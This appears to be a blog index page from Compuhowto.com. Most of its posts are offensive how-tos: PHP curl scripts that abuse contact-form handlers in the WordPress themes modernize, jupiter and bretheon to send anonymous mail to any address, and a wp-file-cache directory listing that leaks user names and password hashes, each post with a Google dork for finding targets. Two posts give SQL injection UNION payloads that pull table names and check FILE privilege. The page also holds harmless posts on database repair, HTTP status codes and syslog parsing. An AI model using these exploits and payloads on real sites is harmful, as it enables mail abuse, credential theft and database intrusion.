Compuhowto.com

wp_options is marked as crashed

A recent corruption on this sites database left me questioning my backup integrity. Thankfully I was able to fix my tables without having to do a restore and this is how I did it.

Continue reading

WordPress Plugin Exploit wp-file-cache information disclosure

########################################################################
#
# Exploit Title: WordPress plugin wp-file-cache
# Date: 2014 12 December
# Author:
# Vendor:
# Security Risk: Medium
# Category: WebApps
# Google Dork: inurl:/wp-content/plugins/wp-file-cache/
# Tested on: Linux
#
########################################################################

Exploit : Information disclosure (user names, hashed passwords, etc)

Browse to url http://www.example.com/wp-content/plugins/wp-file-cache/cache/

# 12/12/2014

HTTP Error Messages

We have all seen them before: 500, 404, and so on. What do they mean and why do we get them. Well below is a list of HTTP Status messages.

1xx – Informational
100 Continue – The server has received the request headers, and the client should proceed to send the request body.

101 Switching Protocols – The requester has asked the server to switch protocols

103 Checkpoint – Used in the resumable requests proposal to resume aborted PUT or POST requests

Continue reading

WordPress Theme Exploit submit_contact_widget

WordPress submit_contact_widget / submit_contact_form anonymous email issue.

########################################################################
#
# Exploit Title: WordPress submit_contact_widget / submit_contact_form
# Date: 2014 28 November
# Author:
# Vendor:
# Security Risk: low
# Category: WebApps
# Google Dork: inurl:/wp-content/themes/modernize-v3-15
# Tested on: Linux
#
########################################################################

Exploit : Send Anonymous Email

<?php
$site = 'http://site.com/wp-admin/admin-ajax.php';
$ch = curl_init($site);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
 array(
 'action' => "submit_contact_widget",
 'widget-contactName' => "hpoot",
 'widget-email' => "thememail@test.com",
 'widget-comments'=> "Hello from theme",
 'receiver-email' => "larrywaters@mailinator.com"
 ));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

# 11/28/2014

WordPress Theme Exploit mk_contact_form


########################################################################
#
# Exploit Title: WordPress mk_contact_form
# Date: 2014 28 November
# Author:
# Vendor: 
# Security Risk: low
# Category: WebApps
# Google Dork: inurl:/wp-content/themes/jupiter
# Tested on: Linux
#
########################################################################

Exploit : Send Anonymous Email

<?php
$site = 'http://site.com/wp-admin/admin-ajax.php';
$ch = curl_init($site);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array(
                'action' => "mk_contact_form",
                'name' => "hpoot",
                'email' => "thememail@test.com",
                'phone' => "555-555-5555",
                'content'=> "Hello from theme",
                'to' => "larrywaters@mailinator.com"
        ));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>


# 11/28/2014

Illegal mix of collations for operation ‘UNION’

Error in query: Illegal mix of collations for operation ‘UNION’

You found the injection point then you are trying to get the table names extracted and the error above pops up. Why is this happening? What are some tricks we can use to overcome and extract?

First let me explain why this error occurs. This problem will occur when the database is not set to CHAR is not set by default in the database. Simple enough, so how do we get around this problem?

What you have to do is convert the data being extracted. To do this we can do the following:

1. unhex(hex(group_concat(table_name)))

http://www.example.com/events.php?id=3 UNION SELECT 1,2,unhex(hex(group_concat(table_name))),4,5,6,7 from information_schema.tables where table_schema = database()–

2. convert(group_concat(table_name)+using+ascii)

http://www.mamatrash.com/events.php?id=3 UNION SELECT 1,2,3,convert(group_concat(table_name)+using+ascii),5,6,7 from information_schema.tables where table_schema = database()–

You should now have the extracted table names. If I learn more tricks I will include those as well.

SQL Injection File Privilege

In this short how to I will show you how to verify if the current user has file permission.

First make sure you have found an inject-able location.

www.example.com/events.php?id=1′

Next using your union statement try the following:

www.example.com/events.php?id=-1 union select 1,grantee,3,is_grantable FROM information_schema.user_privileges–

The is_grantable is what we are looking at.  You will either get a ‘YES’ or a ‘NO’

Python Parse Syslog

A little python script to parse out DST,SRC,PROTO,SPT,DPT out of your syslogs.

First install sysklogd: apt-get install sysklogd
Next under your router forward syslog to your machine
Finally use the code below to extract the information from the /var/log/kern.log file.

#!/usr/bin/python
import re

def writeips(i):
        t = open("/var/log/ips.log","a")
        t.write(i+'\n')
        t.close()

def readsyslg():
        f = open("/var/log/kern.log","r")
        for line in f:
                ips = re.findall("SRC=[0-9.]+\s+DST=[0-9.]+",line)
                pro = re.findall("PROTO=[A-Z.]+",line)
                prt = re.findall("SPT=[0-9.]+\s+DPT=[0-9.]+",line)
                writeips(str(ips + pro + prt))
        f.close()

def main():
        readsyslg()

if __name__ == "__main__":
        main()

If you have improvements for this script leave it in the comments to be added/modified.

WordPress Theme Bretheon Email


########################################################################
#
# Exploit Title: WordPress Theme bretheon
# Date: 2013 23 November
# Author:
# Vendor: 
# Security Risk: low
# Category: WebApps
# Google Dork: inurl:/wp-content/themes/bretheon/
# Tested on: Linux
#
########################################################################

Exploit : Send Anonymous Email

<?php
$ch = curl_init("http://www.example.com/wp-content/themes/bretheon/functions/theme-mail.php");
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array(
                'To' => "hpoot@mailinator.com",
                'Name' => "theme-mail",
                'Email' => "fakeuser@thissite.com",
                'Message'=> "Hello from bretheon theme",
                'Subject' => "This is a test"
        ));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>


# 11/23/2013
« Older posts

Copyright © 2016 Compuhowto.com

Theme by Anders NorenUp ↑